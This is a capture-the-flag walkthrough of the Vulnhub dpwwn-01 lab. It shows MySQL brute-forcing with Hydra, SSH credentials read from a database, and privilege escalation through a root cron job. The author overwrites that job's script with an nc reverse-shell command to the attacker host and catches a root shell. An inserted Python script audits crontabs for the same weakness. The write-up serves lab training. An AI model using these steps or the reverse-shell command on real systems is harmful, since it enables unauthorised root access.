Vulnhub dpwwn-01 penetration test execution log

For the lab environment setup, see:

https://blog.csdn.net/qq_33163046/article/details/106544200

Attacker machine:

10.42.**.56 (192.168.56.111)

Steps:

1. Scan the subnet with nmap to identify the target's IP

root@kali:~# nmap -sS -Pn -A 192.168.56.0/24
......
Nmap scan report for 192.168.56.137
Host is up (0.00012s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 08:00:27:C2:6A:E9 (Oracle VirtualBox virtual NIC)

2. Brute-force the MySQL service on port 3306

root@kali:~# hydra -l root -P passwd.txt -e ns -vV mysql://192.168.56.137
......
[VERBOSE] using default db 'mysql'
[STATUS] attack finished for 192.168.56.137 (waiting for children to complete tests)
[3306][mysql] host: 192.168.56.137   login: root
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-03 23:56:25

3. Connect as root with an empty password

root@kali:~# mysql -h 192.168.56.137 -p -P3306
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 16
Server version: 5.5.60-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

4. List the databases, notice the one named ssh, and read a working SSH username and password from it

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| ssh                |
+--------------------+
4 rows in set (0.049 sec)

MariaDB [(none)]> use ssh;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.054 sec)

5. SSH into the target from the attacker machine with those credentials

root@kali:~# ssh -p22 mistic@192.168.56.137
mistic@192.168.56.137's password:
Last failed login: Thu Jun  4 03:15:19 EDT 2020 on tty1
There were 2 failed login attempts since the last successful login.
Last login: Thu Aug  1 14:41:37 2019 from 192.168.30.145
[mistic@dpwwn-01 ~]$
[mistic@dpwwn-01 ~]$ ls -l
total 4
-rwx------. 1 mistic mistic 186 Aug  1  2019 logrot.sh

6. Download and run LinEnum.sh; it shows a cron job that runs a script in mistic's home directory (logrot.sh) as root every 3 minutes

[mistic@dpwwn-01 ~]$ chmod +x LinEnum.sh
[mistic@dpwwn-01 ~]$ ls -l
total 52
-rwxrwxr-x. 1 mistic mistic 46633 Jun  4 05:11 LinEnum.sh
-rwx------. 1 mistic mistic    36 Jun  4 03:35 logrot.sh

[mistic@dpwwn-01 ~]$ ./LinEnum.sh
......
[-] Crontab contents:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

*/3 *  * * *  root  /home/mistic/logrot.sh
......
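The crontab entry above is the entire weakness: cron runs as root a script that an unprivileged user owns. The audit script below is an added example, not part of this write-up or of LinEnum; it parses an /etc/crontab-style file and flags root jobs that reference a file a non-root user owns or can write, going beyond this single case by also checking command arguments and @reboot-style lines. The sample crontab and the ownership table are constructed; lookup_real is the hook for running it against a live host.

```python
import os
import shlex
import stat

# Constructed /etc/crontab excerpt modelled on the finding above: a root job
# whose script sits in an unprivileged user's home directory.
SAMPLE_CRONTAB = """SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
*/3 *  * * *  root  /home/mistic/logrot.sh
0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf
"""
# Constructed ownership table standing in for os.stat: path -> (uid, mode bits).
SAMPLE_FS = {
    "/home/mistic/logrot.sh": (1000, 0o700),  # owned by mistic, not root
    "/usr/sbin/logrotate": (0, 0o755),
    "/etc/logrotate.conf": (0, 0o644),
}
lookup_sample = SAMPLE_FS.get

def lookup_real(path):
    """Stat a path on a live host: (uid, permission bits) or None if absent."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, stat.S_IMODE(st.st_mode)

def audit_system_crontab(text, lookup=lookup_sample):
    """Return (line_no, path, reason) for every root job in an /etc/crontab-style
    file (6th field is the user) whose command references an absolute path that
    a non-root user owns or can write. @reboot-style lines are handled too."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or "=" in s.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        want = 3 if s.startswith("@") else 7  # "@spec user cmd" or "m h dom mon dow user cmd"
        parts = s.split(None, want - 1)
        if len(parts) != want or parts[-2] != "root":
            continue
        for tok in shlex.split(parts[-1]):
            info = lookup(tok) if tok.startswith("/") else None
            if info is None:
                continue  # not an absolute path, or path does not exist
            if info[0] != 0:
                findings.append((n, tok, f"owned by uid {info[0]}"))
            elif info[1] & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((n, tok, "group/world writable"))
    return findings
```

On a real host call `audit_system_crontab(open("/etc/crontab").read(), lookup_real)`; the same parser applies to the files under /etc/cron.d, which use the same six-field-plus-user layout.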

7. Put an nc reverse-shell command into logrot.sh

[mistic@dpwwn-01 ~]$ echo nc -e /bin/bash 192.168.56.111 4444 >logrot.sh
[mistic@dpwwn-01 ~]$ cat logrot.sh
nc -e /bin/bash 192.168.56.111 4444

8. On the attacker host, listen on port 4444 with nc and wait for the reverse-shell script, which the target runs every 3 minutes. The result is a shell with poor interactivity running as root. To make it more usable, a Python one-liner is used to spawn a pty.

root@kali:~# nc -lvvp 4444
listening on [any] 4444 ...
192.168.56.137: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.137] 47728
python -c 'import pty; pty.spawn("/bin/bash")'
[root@dpwwn-01 ~]# whoami
whoami
root

9. Get the FLAG; the exercise is complete

[root@dpwwn-01 ~]# ls
anaconda-ks.cfg  dpwwn-01-FLAG.txt
[root@dpwwn-01 ~]# cat dpwwn-01-FLAG.txt
Congratulation! I knew you can pwn it as this very easy challenge.
Thank you.

64445777
6e643634
37303737
37373665
36347077
776e6450
4077246e
33373336
36359090

LinEnum.sh script: https://github.com/rebootuser/LinEnum

Introduction to scheduled script execution (cron) on Linux: https://blog.csdn.net/ycf921244819/article/details/80520217?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase

Reference article: https://www.dongluliang.com/?p=737
